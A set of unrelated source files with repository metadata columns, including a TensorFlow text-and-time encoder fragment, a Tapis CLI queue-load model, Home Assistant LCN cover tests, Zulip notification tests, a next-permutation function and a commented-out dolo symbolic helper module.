self.episode_len = episode_len
self.num_layers = num_layers
self.d_model = d_model
self.num_heads = num_heads
self.dff = dff
self.dropout_rate = dropout_rate
self.subword_embed_dim = subword_embed_dim
self.action_embed_dim = action_embed_dim
self.min_filter_width = min_filter_width
self.max_filter_width = max_filter_width
self.num_filters = num_filters
self.filter_activation = filter_activation
self.final_activation = final_activation
self.use_gn = use_gn
self.use_GLU = use_GLU
self.use_attn_text_encoder = use_attn_text_encoder
self.time_encoding = time_encoding
self.use_separable_conv = use_separable_conv
self.subword_embedding = Embedding(self.num_symbols, self.subword_embed_dim,
name='subword_embedding')
if self.use_attn_text_encoder:
self.attn_text_encoder = SimpleAttentionEncoder(d_model=self.subword_embed_dim,
num_layers=self.num_layers)
else:
for width in range(self.min_filter_width, self.max_filter_width + 1):
if self.use_separable_conv:
conv = SeparableConv1D(self.num_filters, width,
depth_multiplier=1, activation=self.filter_activation)
else:
conv = Conv1D(self.num_filters, width, activation=self.filter_activation)
setattr(self, f'conv_{width}', conv)
if self.use_gn:
setattr(self, f'norm_{width}', GroupNormalization())
self.dense_1 = Dense(self.d_model)
self.encoder = SimpleAttentionEncoder(d_model=self.d_model, num_layers=self.num_layers)
self.mlp = LayerNormalizedProjection(self.embedding_dim,
activation=self.final_activation)
@tf.function
def call(self, inputs, training=False):
features = []
# Extract text features
net = inputs[F.SYMBOLS.value]
batch_size = tf.shape(net)[0]
episode_len = tf.shape(net)[1]
net = tf.reshape(net, [-1, self.padded_length])
swe = self.subword_embedding(net)
if self.use_attn_text_encoder:
net = self.attn_text_encoder(swe, training=training)
else:
fs = []
for width in range(self.min_filter_width, self.max_filter_width + 1):
layer = getattr(self, f'conv_{width}')
net = layer(swe)
if self.use_gn:
layer_norm = getattr(self, f'norm_{width}')
net = layer_norm(net)
net = tf.reduce_max(net, axis=1, keepdims=False)
fs.append(net)
net = tf.concat(fs, axis=-1)
feature_dim = net.get_shape()[-1]
net = tf.reshape(net, [batch_size, episode_len, feature_dim])
features.append(net)
# No Action embedding
# Hour embedding
hour = inputs[F.HOUR.value]
features.append(tf.one_hot(hour, 24, dtype=tf.float32, name='hour_onehot'))
# Day embedding
if F.DAY.value in inputs:
features.append(tf.one_hot(inputs[F.DAY.value], 7, dtype=tf.float32, name='day_onehot'))
lengths = inputs[F.NUM_POSTS.value]
lengths = tf.reshape(lengths, [batch_size])
mask = tf.sequence_mask(lengths, maxlen=episode_len)
net = tf.concat(features, axis=-1)
net = self.dense_1(net) # [batch_size, dim]
net = self.encoder(net, training=training, mask=mask)
net = self.mlp(net, training=training)
return net
| 42.65748
| 100
| 0.617628
| 1,319
| 10,835
| 4.801365
| 0.142532
| 0.025422
| 0.03316
| 0.028423
| 0.839571
| 0.819991
| 0.819991
| 0.819991
| 0.819991
| 0.819991
| 0
| 0.013535
| 0.290817
| 10,835
| 253
| 101
| 42.826087
| 0.810646
| 0.07725
| 0
| 0.893401
| 0
| 0
| 0.021861
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020305
| false
| 0
| 0.060914
| 0
| 0.101523
| 0.005076
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4fe8a383766a96a5d677b037865180afc9ce9960
| 1,888
|
py
|
Python
|
tapis_cli/commands/taccapis/v2/systems/models/system_queue_load.py
|
bpachev/tapis-cli
|
c3128fb5b63ef74e06b737bbd95ef28fb24f0d32
|
[
"BSD-3-Clause"
] | 8
|
2020-10-18T22:48:23.000Z
|
2022-01-10T09:16:14.000Z
|
tapis_cli/commands/taccapis/v2/systems/models/system_queue_load.py
|
bpachev/tapis-cli
|
c3128fb5b63ef74e06b737bbd95ef28fb24f0d32
|
[
"BSD-3-Clause"
] | 238
|
2019-09-04T14:37:54.000Z
|
2020-04-15T16:24:24.000Z
|
tapis_cli/commands/taccapis/v2/systems/models/system_queue_load.py
|
bpachev/tapis-cli
|
c3128fb5b63ef74e06b737bbd95ef28fb24f0d32
|
[
"BSD-3-Clause"
] | 5
|
2019-09-20T04:23:49.000Z
|
2020-01-16T17:45:14.000Z
|
from tapis_cli.display import Verbosity
from tapis_cli.search import argtype, argmod
from .system import System
__all__ = ['SystemQueueLoad']
class SystemQueueLoad(System):
"""Model of the load on a Tapis system virtual queue
"""
SEARCH_ARGS = [
# JSON_field, type, verbosity, mods_allowed, default_mod, choices, override_option, searchable
("active", argtype.INTEGER, Verbosity.LISTING, argmod.STRING_DEFAULTS,
argmod.DEFAULT, None, None, False),
("backlogged", argtype.INTEGER, Verbosity.LISTING,
argmod.STRING_DEFAULTS, argmod.DEFAULT, None, None, False),
("pending", argtype.INTEGER, Verbosity.LISTING, argmod.STRING_DEFAULTS,
argmod.DEFAULT, None, None, False),
("paused", argtype.INTEGER, Verbosity.LISTING, argmod.STRING_DEFAULTS,
argmod.DEFAULT, None, None, False),
("processingInputs", argtype.INTEGER, Verbosity.LISTING,
argmod.STRING_DEFAULTS, argmod.DEFAULT, None, None, False),
("stagingInputs", argtype.INTEGER, Verbosity.LISTING,
argmod.STRING_DEFAULTS, argmod.DEFAULT, None, None, False),
("staging", argtype.INTEGER, Verbosity.LISTING, argmod.STRING_DEFAULTS,
argmod.DEFAULT, None, None, False),
("submitting", argtype.INTEGER, Verbosity.LISTING,
argmod.STRING_DEFAULTS, argmod.DEFAULT, None, None, False),
("queued", argtype.INTEGER, Verbosity.LISTING, argmod.STRING_DEFAULTS,
argmod.DEFAULT, None, None, False),
("running", argtype.INTEGER, Verbosity.LISTING, argmod.STRING_DEFAULTS,
argmod.DEFAULT, None, None, False),
("cleaningUp", argtype.INTEGER, Verbosity.LISTING,
argmod.STRING_DEFAULTS, argmod.DEFAULT, None, None, False),
("archiving", argtype.INTEGER, Verbosity.LISTING,
argmod.STRING_DEFAULTS, argmod.DEFAULT, None, None, False)
]
| 49.684211
| 98
| 0.690148
| 202
| 1,888
| 6.336634
| 0.252475
| 0.13125
| 0.215625
| 0.28125
| 0.7125
| 0.7125
| 0.7125
| 0.7125
| 0.7125
| 0.7125
| 0
| 0
| 0.193326
| 1,888
| 37
| 99
| 51.027027
| 0.840446
| 0.07839
| 0
| 0.354839
| 0
| 0
| 0.070358
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.096774
| 0
| 0.16129
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8b47d8e56ca8555dedac851eaeaea507aa6fff4a
| 46
|
py
|
Python
|
BPPChecker/bpptools/checker/__init__.py
|
sansazhao/BPPChecker
|
3d722804c172deddaabeec8b3eea5062c37999f1
|
[
"MIT"
] | null | null | null |
BPPChecker/bpptools/checker/__init__.py
|
sansazhao/BPPChecker
|
3d722804c172deddaabeec8b3eea5062c37999f1
|
[
"MIT"
] | null | null | null |
BPPChecker/bpptools/checker/__init__.py
|
sansazhao/BPPChecker
|
3d722804c172deddaabeec8b3eea5062c37999f1
|
[
"MIT"
] | null | null | null |
from . import blchecker
from . import rchecker
| 23
| 23
| 0.804348
| 6
| 46
| 6.166667
| 0.666667
| 0.540541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152174
| 46
| 2
| 24
| 23
| 0.948718
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8c6b814e525ff90cb95fe0151b2db21ed244172d
| 12,324
|
py
|
Python
|
tests/components/lcn/test_cover.py
|
liangleslie/core
|
cc807b4d597daaaadc92df4a93c6e30da4f570c6
|
[
"Apache-2.0"
] | 30,023
|
2016-04-13T10:17:53.000Z
|
2020-03-02T12:56:31.000Z
|
tests/components/lcn/test_cover.py
|
liangleslie/core
|
cc807b4d597daaaadc92df4a93c6e30da4f570c6
|
[
"Apache-2.0"
] | 24,710
|
2016-04-13T08:27:26.000Z
|
2020-03-02T12:59:13.000Z
|
tests/components/lcn/test_cover.py
|
liangleslie/core
|
cc807b4d597daaaadc92df4a93c6e30da4f570c6
|
[
"Apache-2.0"
] | 11,956
|
2016-04-13T18:42:31.000Z
|
2020-03-02T09:32:12.000Z
|
"""Test for the LCN cover platform."""
from unittest.mock import patch
from pypck.inputs import ModStatusOutput, ModStatusRelays
from pypck.lcn_addr import LcnAddr
from pypck.lcn_defs import MotorReverseTime, MotorStateModifier
from homeassistant.components.cover import DOMAIN as DOMAIN_COVER
from homeassistant.components.lcn.helpers import get_device_connection
from homeassistant.const import (
ATTR_ENTITY_ID,
SERVICE_CLOSE_COVER,
SERVICE_OPEN_COVER,
SERVICE_STOP_COVER,
STATE_CLOSED,
STATE_CLOSING,
STATE_OPEN,
STATE_OPENING,
STATE_UNAVAILABLE,
)
from homeassistant.helpers import entity_registry as er
from .conftest import MockModuleConnection
async def test_setup_lcn_cover(hass, entry, lcn_connection):
"""Test the setup of cover."""
for entity_id in (
"cover.cover_outputs",
"cover.cover_relays",
):
state = hass.states.get(entity_id)
assert state is not None
assert state.state == STATE_OPEN
async def test_entity_attributes(hass, entry, lcn_connection):
"""Test the attributes of an entity."""
entity_registry = er.async_get(hass)
entity_outputs = entity_registry.async_get("cover.cover_outputs")
assert entity_outputs
assert entity_outputs.unique_id == f"{entry.entry_id}-m000007-outputs"
assert entity_outputs.original_name == "Cover_Outputs"
entity_relays = entity_registry.async_get("cover.cover_relays")
assert entity_relays
assert entity_relays.unique_id == f"{entry.entry_id}-m000007-motor1"
assert entity_relays.original_name == "Cover_Relays"
@patch.object(MockModuleConnection, "control_motors_outputs")
async def test_outputs_open(control_motors_outputs, hass, lcn_connection):
"""Test the outputs cover opens."""
state = hass.states.get("cover.cover_outputs")
state.state = STATE_CLOSED
# command failed
control_motors_outputs.return_value = False
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_OPEN_COVER,
{ATTR_ENTITY_ID: "cover.cover_outputs"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_outputs.assert_awaited_with(
MotorStateModifier.UP, MotorReverseTime.RT1200
)
state = hass.states.get("cover.cover_outputs")
assert state is not None
assert state.state != STATE_OPENING
# command success
control_motors_outputs.reset_mock(return_value=True)
control_motors_outputs.return_value = True
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_OPEN_COVER,
{ATTR_ENTITY_ID: "cover.cover_outputs"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_outputs.assert_awaited_with(
MotorStateModifier.UP, MotorReverseTime.RT1200
)
state = hass.states.get("cover.cover_outputs")
assert state is not None
assert state.state == STATE_OPENING
@patch.object(MockModuleConnection, "control_motors_outputs")
async def test_outputs_close(control_motors_outputs, hass, lcn_connection):
"""Test the outputs cover closes."""
state = hass.states.get("cover.cover_outputs")
state.state = STATE_OPEN
# command failed
control_motors_outputs.return_value = False
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_CLOSE_COVER,
{ATTR_ENTITY_ID: "cover.cover_outputs"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_outputs.assert_awaited_with(
MotorStateModifier.DOWN, MotorReverseTime.RT1200
)
state = hass.states.get("cover.cover_outputs")
assert state is not None
assert state.state != STATE_CLOSING
# command success
control_motors_outputs.reset_mock(return_value=True)
control_motors_outputs.return_value = True
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_CLOSE_COVER,
{ATTR_ENTITY_ID: "cover.cover_outputs"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_outputs.assert_awaited_with(
MotorStateModifier.DOWN, MotorReverseTime.RT1200
)
state = hass.states.get("cover.cover_outputs")
assert state is not None
assert state.state == STATE_CLOSING
@patch.object(MockModuleConnection, "control_motors_outputs")
async def test_outputs_stop(control_motors_outputs, hass, lcn_connection):
"""Test the outputs cover stops."""
state = hass.states.get("cover.cover_outputs")
state.state = STATE_CLOSING
# command failed
control_motors_outputs.return_value = False
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_STOP_COVER,
{ATTR_ENTITY_ID: "cover.cover_outputs"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_outputs.assert_awaited_with(MotorStateModifier.STOP)
state = hass.states.get("cover.cover_outputs")
assert state is not None
assert state.state == STATE_CLOSING
# command success
control_motors_outputs.reset_mock(return_value=True)
control_motors_outputs.return_value = True
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_STOP_COVER,
{ATTR_ENTITY_ID: "cover.cover_outputs"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_outputs.assert_awaited_with(MotorStateModifier.STOP)
state = hass.states.get("cover.cover_outputs")
assert state is not None
assert state.state not in (STATE_CLOSING, STATE_OPENING)
@patch.object(MockModuleConnection, "control_motors_relays")
async def test_relays_open(control_motors_relays, hass, lcn_connection):
"""Test the relays cover opens."""
states = [MotorStateModifier.NOCHANGE] * 4
states[0] = MotorStateModifier.UP
state = hass.states.get("cover.cover_relays")
state.state = STATE_CLOSED
# command failed
control_motors_relays.return_value = False
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_OPEN_COVER,
{ATTR_ENTITY_ID: "cover.cover_relays"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_relays.assert_awaited_with(states)
state = hass.states.get("cover.cover_relays")
assert state is not None
assert state.state != STATE_OPENING
# command success
control_motors_relays.reset_mock(return_value=True)
control_motors_relays.return_value = True
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_OPEN_COVER,
{ATTR_ENTITY_ID: "cover.cover_relays"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_relays.assert_awaited_with(states)
state = hass.states.get("cover.cover_relays")
assert state is not None
assert state.state == STATE_OPENING
@patch.object(MockModuleConnection, "control_motors_relays")
async def test_relays_close(control_motors_relays, hass, lcn_connection):
"""Test the relays cover closes."""
states = [MotorStateModifier.NOCHANGE] * 4
states[0] = MotorStateModifier.DOWN
state = hass.states.get("cover.cover_relays")
state.state = STATE_OPEN
# command failed
control_motors_relays.return_value = False
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_CLOSE_COVER,
{ATTR_ENTITY_ID: "cover.cover_relays"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_relays.assert_awaited_with(states)
state = hass.states.get("cover.cover_relays")
assert state is not None
assert state.state != STATE_CLOSING
# command success
control_motors_relays.reset_mock(return_value=True)
control_motors_relays.return_value = True
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_CLOSE_COVER,
{ATTR_ENTITY_ID: "cover.cover_relays"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_relays.assert_awaited_with(states)
state = hass.states.get("cover.cover_relays")
assert state is not None
assert state.state == STATE_CLOSING
@patch.object(MockModuleConnection, "control_motors_relays")
async def test_relays_stop(control_motors_relays, hass, lcn_connection):
"""Test the relays cover stops."""
states = [MotorStateModifier.NOCHANGE] * 4
states[0] = MotorStateModifier.STOP
state = hass.states.get("cover.cover_relays")
state.state = STATE_CLOSING
# command failed
control_motors_relays.return_value = False
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_STOP_COVER,
{ATTR_ENTITY_ID: "cover.cover_relays"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_relays.assert_awaited_with(states)
state = hass.states.get("cover.cover_relays")
assert state is not None
assert state.state == STATE_CLOSING
# command success
control_motors_relays.reset_mock(return_value=True)
control_motors_relays.return_value = True
await hass.services.async_call(
DOMAIN_COVER,
SERVICE_STOP_COVER,
{ATTR_ENTITY_ID: "cover.cover_relays"},
blocking=True,
)
await hass.async_block_till_done()
control_motors_relays.assert_awaited_with(states)
state = hass.states.get("cover.cover_relays")
assert state is not None
assert state.state not in (STATE_CLOSING, STATE_OPENING)
async def test_pushed_outputs_status_change(hass, entry, lcn_connection):
"""Test the outputs cover changes its state on status received."""
device_connection = get_device_connection(hass, (0, 7, False), entry)
address = LcnAddr(0, 7, False)
state = hass.states.get("cover.cover_outputs")
state.state = STATE_CLOSED
# push status "open"
input = ModStatusOutput(address, 0, 100)
await device_connection.async_process_input(input)
await hass.async_block_till_done()
state = hass.states.get("cover.cover_outputs")
assert state is not None
assert state.state == STATE_OPENING
# push status "stop"
input = ModStatusOutput(address, 0, 0)
await device_connection.async_process_input(input)
await hass.async_block_till_done()
state = hass.states.get("cover.cover_outputs")
assert state is not None
assert state.state not in (STATE_OPENING, STATE_CLOSING)
# push status "close"
input = ModStatusOutput(address, 1, 100)
await device_connection.async_process_input(input)
await hass.async_block_till_done()
state = hass.states.get("cover.cover_outputs")
assert state is not None
assert state.state == STATE_CLOSING
async def test_pushed_relays_status_change(hass, entry, lcn_connection):
"""Test the relays cover changes its state on status received."""
device_connection = get_device_connection(hass, (0, 7, False), entry)
address = LcnAddr(0, 7, False)
states = [False] * 8
state = hass.states.get("cover.cover_relays")
state.state = STATE_CLOSED
# push status "open"
states[0:2] = [True, False]
input = ModStatusRelays(address, states)
await device_connection.async_process_input(input)
await hass.async_block_till_done()
state = hass.states.get("cover.cover_relays")
assert state is not None
assert state.state == STATE_OPENING
# push status "stop"
states[0] = False
input = ModStatusRelays(address, states)
await device_connection.async_process_input(input)
await hass.async_block_till_done()
state = hass.states.get("cover.cover_relays")
assert state is not None
assert state.state not in (STATE_OPENING, STATE_CLOSING)
# push status "close"
states[0:2] = [True, True]
input = ModStatusRelays(address, states)
await device_connection.async_process_input(input)
await hass.async_block_till_done()
state = hass.states.get("cover.cover_relays")
assert state is not None
assert state.state == STATE_CLOSING
async def test_unload_config_entry(hass, entry, lcn_connection):
"""Test the cover is removed when the config entry is unloaded."""
await hass.config_entries.async_unload(entry.entry_id)
assert hass.states.get("cover.cover_outputs").state == STATE_UNAVAILABLE
assert hass.states.get("cover.cover_relays").state == STATE_UNAVAILABLE
| 31.438776
| 76
| 0.725333
| 1,565
| 12,324
| 5.428115
| 0.075399
| 0.061212
| 0.045909
| 0.059329
| 0.849912
| 0.846969
| 0.826251
| 0.797999
| 0.773867
| 0.769041
| 0
| 0.005899
| 0.188413
| 12,324
| 391
| 77
| 31.519182
| 0.843431
| 0.027183
| 0
| 0.74552
| 0
| 0
| 0.089722
| 0.016709
| 0
| 0
| 0
| 0
| 0.207885
| 1
| 0
| false
| 0
| 0.032258
| 0
| 0.032258
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8c6e95266f01e63c6daaf1af317023aaca4c382c
| 824
|
py
|
Python
|
correct_python_programs/next_permutation.py
|
PatrickShaw/QuixBugs
|
5a2eb2987fdac12860b526ffa92a57e5831fd639
|
[
"MIT"
] | 22
|
2018-01-29T01:56:30.000Z
|
2022-03-21T12:25:40.000Z
|
correct_python_programs/next_permutation.py
|
zixifan/QuixBugs
|
5a2eb2987fdac12860b526ffa92a57e5831fd639
|
[
"MIT"
] | 31
|
2017-12-18T21:04:34.000Z
|
2022-02-21T07:38:09.000Z
|
correct_python_programs/next_permutation.py
|
zixifan/QuixBugs
|
5a2eb2987fdac12860b526ffa92a57e5831fd639
|
[
"MIT"
] | 19
|
2018-01-06T14:18:33.000Z
|
2022-03-21T12:25:43.000Z
|
def next_permutation(perm):
for i in range(len(perm) - 2, -1, -1):
if perm[i] < perm[i + 1]:
for j in range(len(perm) - 1, i, -1):
if perm[i] < perm[j]:
next_perm = list(perm)
next_perm[i], next_perm[j] = perm[j], perm[i]
next_perm[i + 1:] = reversed(next_perm[i + 1:])
return next_perm
"""
def next_permutation(perm):
for i in range(len(perm) - 2, -1, -1):
if perm[i] < perm[i + 1]:
for j in range(len(perm) - 1, i, -1):
if perm[j] > perm[i]:
next_perm = list(perm)
next_perm[i], next_perm[j] = perm[j], perm[i]
next_perm[i + 1:] = reversed(next_perm[i + 1:])
return next_perm
"""
| 35.826087
| 67
| 0.441748
| 118
| 824
| 2.966102
| 0.135593
| 0.2
| 0.102857
| 0.185714
| 0.997143
| 0.982857
| 0.965714
| 0.965714
| 0.965714
| 0.965714
| 0
| 0.032653
| 0.40534
| 824
| 22
| 68
| 37.454545
| 0.681633
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8cbb4ec41d0315e171e0a7a3226626aa30ae80e5
| 6,454
|
py
|
Python
|
zerver/tests/test_notification_data.py
|
S-Abhishek/zulip
|
312989581840bb2f54651d9510be4c6ff57d6c1c
|
[
"Apache-2.0"
] | null | null | null |
zerver/tests/test_notification_data.py
|
S-Abhishek/zulip
|
312989581840bb2f54651d9510be4c6ff57d6c1c
|
[
"Apache-2.0"
] | null | null | null |
zerver/tests/test_notification_data.py
|
S-Abhishek/zulip
|
312989581840bb2f54651d9510be4c6ff57d6c1c
|
[
"Apache-2.0"
] | null | null | null |
from zerver.lib.test_classes import ZulipTestCase
class TestNotificationData(ZulipTestCase):
def test_is_push_notifiable(self) -> None:
sender_id = self.example_user("cordelia").id
# Boring case
user_data = self.create_user_notifications_data_object()
self.assertFalse(
user_data.is_push_notifiable(private_message=False, sender_id=sender_id, idle=True)
)
# Notifiable cases for PMs, mentions, stream notifications
user_data = self.create_user_notifications_data_object()
self.assertTrue(
user_data.is_push_notifiable(private_message=True, sender_id=sender_id, idle=True)
)
user_data = self.create_user_notifications_data_object(flags=["mentioned"], mentioned=True)
self.assertTrue(
user_data.is_push_notifiable(private_message=False, sender_id=sender_id, idle=True)
)
user_data = self.create_user_notifications_data_object(
flags=["wildcard_mentioned"], wildcard_mention_notify=True
)
self.assertTrue(
user_data.is_push_notifiable(private_message=False, sender_id=sender_id, idle=True)
)
user_data = self.create_user_notifications_data_object(stream_push_notify=True)
self.assertTrue(
user_data.is_push_notifiable(private_message=False, sender_id=sender_id, idle=True)
)
# Now, test the `online_push_enabled` property
# Test no notifications when not idle
user_data = self.create_user_notifications_data_object()
self.assertFalse(
user_data.is_push_notifiable(private_message=True, sender_id=sender_id, idle=False)
)
# Test notifications are sent when not idle but `online_push_enabled = True`
user_data = self.create_user_notifications_data_object(online_push_enabled=True)
self.assertTrue(
user_data.is_push_notifiable(private_message=True, sender_id=sender_id, idle=False)
)
# The following are hypothetical cases, since a private message can never have `stream_push_notify = True`.
# We just want to test the early (False) return patterns in these special cases:
# Message sender is muted.
user_data = self.create_user_notifications_data_object(
sender_is_muted=True,
flags=["mentioned", "wildcard_mentioned"],
wildcard_mention_notify=True,
mentioned=True,
stream_email_notify=True,
stream_push_notify=True,
)
self.assertFalse(
user_data.is_push_notifiable(private_message=True, sender_id=sender_id, idle=True)
)
# Message sender is the user the object corresponds to.
user_data = self.create_user_notifications_data_object(
id=sender_id,
sender_is_muted=False,
flags=["mentioned", "wildcard_mentioned"],
wildcard_mention_notify=True,
mentioned=True,
stream_email_notify=True,
stream_push_notify=True,
)
self.assertFalse(
user_data.is_push_notifiable(private_message=True, sender_id=sender_id, idle=True)
)
def test_is_email_notifiable(self) -> None:
sender_id = self.example_user("cordelia").id
# Boring case
user_data = self.create_user_notifications_data_object()
self.assertFalse(
user_data.is_email_notifiable(private_message=False, sender_id=sender_id, idle=True)
)
# Notifiable cases for PMs, mentions, stream notifications
user_data = self.create_user_notifications_data_object()
self.assertTrue(
user_data.is_email_notifiable(private_message=True, sender_id=sender_id, idle=True)
)
user_data = self.create_user_notifications_data_object(flags=["mentioned"], mentioned=True)
self.assertTrue(
user_data.is_email_notifiable(private_message=False, sender_id=sender_id, idle=True)
)
user_data = self.create_user_notifications_data_object(
flags=["wildcard_mentioned"], wildcard_mention_notify=True
)
self.assertTrue(
user_data.is_email_notifiable(private_message=False, sender_id=sender_id, idle=True)
)
user_data = self.create_user_notifications_data_object(stream_email_notify=True)
self.assertTrue(
user_data.is_email_notifiable(private_message=False, sender_id=sender_id, idle=True)
)
# Test no notifications when not idle
user_data = self.create_user_notifications_data_object()
self.assertFalse(
user_data.is_email_notifiable(private_message=True, sender_id=sender_id, idle=False)
)
# The following are hypothetical cases, since a private message can never have `stream_email_notify = True`.
# We just want to test the early (False) return patterns in these special cases:
# Message sender is muted.
user_data = self.create_user_notifications_data_object(
sender_is_muted=True,
flags=["mentioned", "wildcard_mentioned"],
wildcard_mention_notify=True,
mentioned=True,
stream_email_notify=True,
stream_push_notify=True,
)
self.assertFalse(
user_data.is_email_notifiable(private_message=True, sender_id=sender_id, idle=True)
)
# Message sender is the user the object corresponds to.
user_data = self.create_user_notifications_data_object(
id=sender_id,
sender_is_muted=False,
flags=["mentioned", "wildcard_mentioned"],
wildcard_mention_notify=True,
mentioned=True,
stream_email_notify=True,
stream_push_notify=True,
)
self.assertFalse(
user_data.is_email_notifiable(private_message=True, sender_id=sender_id, idle=True)
)
def test_is_notifiable(self) -> None:
# This is just for coverage purposes. We've already tested all scenarios above,
# and `is_notifiable` is a simple OR of the email and push functions.
sender_id = self.example_user("cordelia").id
user_data = self.create_user_notifications_data_object()
self.assertTrue(
user_data.is_notifiable(private_message=True, sender_id=sender_id, idle=True)
)
| 41.909091
| 116
| 0.67555
| 771
| 6,454
| 5.303502
| 0.114137
| 0.080215
| 0.068476
| 0.079237
| 0.913671
| 0.912693
| 0.912693
| 0.904622
| 0.904622
| 0.892639
| 0
| 0
| 0.250697
| 6,454
| 153
| 117
| 42.183007
| 0.845534
| 0.155562
| 0
| 0.701754
| 0
| 0
| 0.034248
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 1
| 0.026316
| false
| 0
| 0.008772
| 0
| 0.04386
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
507000aa819cf78a53dc321aad936b7cf62f9625
| 10,314
|
py
|
Python
|
trash/dolo/misc/symbolic_interactive.py
|
zhuang13atJHU/dolo
|
a40c82f3c87e7a051b56fb9d1a0d646433481167
|
[
"BSD-2-Clause"
] | 1
|
2018-12-27T05:32:04.000Z
|
2018-12-27T05:32:04.000Z
|
trash/dolo/misc/symbolic_interactive.py
|
zhuang13atJHU/dolo
|
a40c82f3c87e7a051b56fb9d1a0d646433481167
|
[
"BSD-2-Clause"
] | null | null | null |
trash/dolo/misc/symbolic_interactive.py
|
zhuang13atJHU/dolo
|
a40c82f3c87e7a051b56fb9d1a0d646433481167
|
[
"BSD-2-Clause"
] | 1
|
2019-12-27T19:46:35.000Z
|
2019-12-27T19:46:35.000Z
|
import inspect
import re
from trash.dolo.symbolic.symbolic import Variable,Parameter,Shock,IndexedSymbol
#def set_variables(s,names_dict={}):
# """
# Creates symbolic variable with the name *s*.
# -- a string, either a single variable name, or
# a space separated list of variable names, or
# a list of variable names.
# NOTE: The new variable is both returned and automatically injected into
# the parent's *global* namespace. It's recommended not to use "var" in
# library code, it is better to use symbols() instead.
# EXEMPLES:
# """
#
# frame = inspect.currentframe().f_back
# try:
# if not isinstance(s, list):
# s = re.split('\s|,', s)
# res = []
# for t in s:
# # skip empty stringG
# if not t:
# continue
# if t in names_dict:
# latex_name = names_dict[t]
# else:
# latex_name = None
# sym = Variable(t,0,latex_name)
# frame.f_globals[t] = sym
# res.append(sym)
# res = list(res)
# if len(res) == 0: # var('')
# res = []
# # otherwise var('a b ...')
# frame.f_globals['variables'] = res
# return res
# finally:
# del frame
#
#def add_variables(s,latex_names=None):
# """
# The same as set_variables but doesn't replace the existing variables.
# """
# frame = inspect.currentframe().f_back
# try:
# if not isinstance(s, list):
# s = re.split('\s|,', s)
# if latex_names <> None:
# sl = re.split(' ', latex_names)
# if len(sl)<> len(s):
# raise Exception, "You should supply one latex name per variable"
# res = []
# for i in range(len(s)):
# t=s[i]
# # skip empty stringG
# if not t:
# continue
# if latex_names == None:
# sym = Variable(t,0)
# else:
# sym = Variable(t,0,latex_name=sl[i])
# frame.f_globals[t] = sym
# res.append(sym)
# res = list(res)
# if len(res) == 0: # var('')
# res = []
# # otherwise var('a b ...')
# frame.f_globals['variables'] += res
# return res
# finally:
# del frame
#
#def set_shocks(s,latex_names=None,names_dict={}):
# """
# Creates symbolic variable with the name *s*.
# -- a string, either a single variable name, or
# a space separated list of variable names, or
# a list of variable names.
# NOTE: The new variable is both returned and automatically injected into
# the parent's *global* namespace. It's recommended not to use "var" in
# library code, it is better to use symbols() instead.
# EXAMPLES:
# """
#
